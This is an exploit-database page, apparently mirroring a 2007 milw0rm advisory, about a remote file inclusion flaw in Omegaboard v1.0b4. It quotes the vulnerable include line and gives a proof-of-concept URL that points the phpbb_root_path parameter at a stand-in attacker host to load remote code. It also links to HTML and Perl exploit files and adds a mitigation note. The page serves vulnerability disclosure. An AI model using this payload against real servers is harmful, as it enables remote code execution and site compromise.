header-logo
Suggest Exploit
vendor:
Omegaboard
by:
xoron
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Omegaboard
Affected Version From: v1.0b4
Affected Version To: v1.0b4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Omegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit

This exploit allows an attacker to include arbitrary remote files in the target system using the 'phpbb_root_path' parameter in the 'functions.php' file of Omegaboard v1.0b4. By manipulating the 'phpbb_root_path' parameter, an attacker can execute malicious code or gain unauthorized access to the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Omegaboard that fixes the remote file inclusion vulnerability. Additionally, ensure that the 'phpbb_root_path' parameter is properly sanitized and validated before including any files.
Source

Exploit-DB raw data:

-----------------------------------------------

Omegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz - xoron.info

-----------------------------------------------

Code: 

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

Exploit: Exploit coded by xoron..!

HTML
www.xoron.info/bugs/omegaboard-html.txt

PERL
www.xoron.info/bugs/omegaboard-perl.txt

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=120703

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

# milw0rm.com [2007-01-31]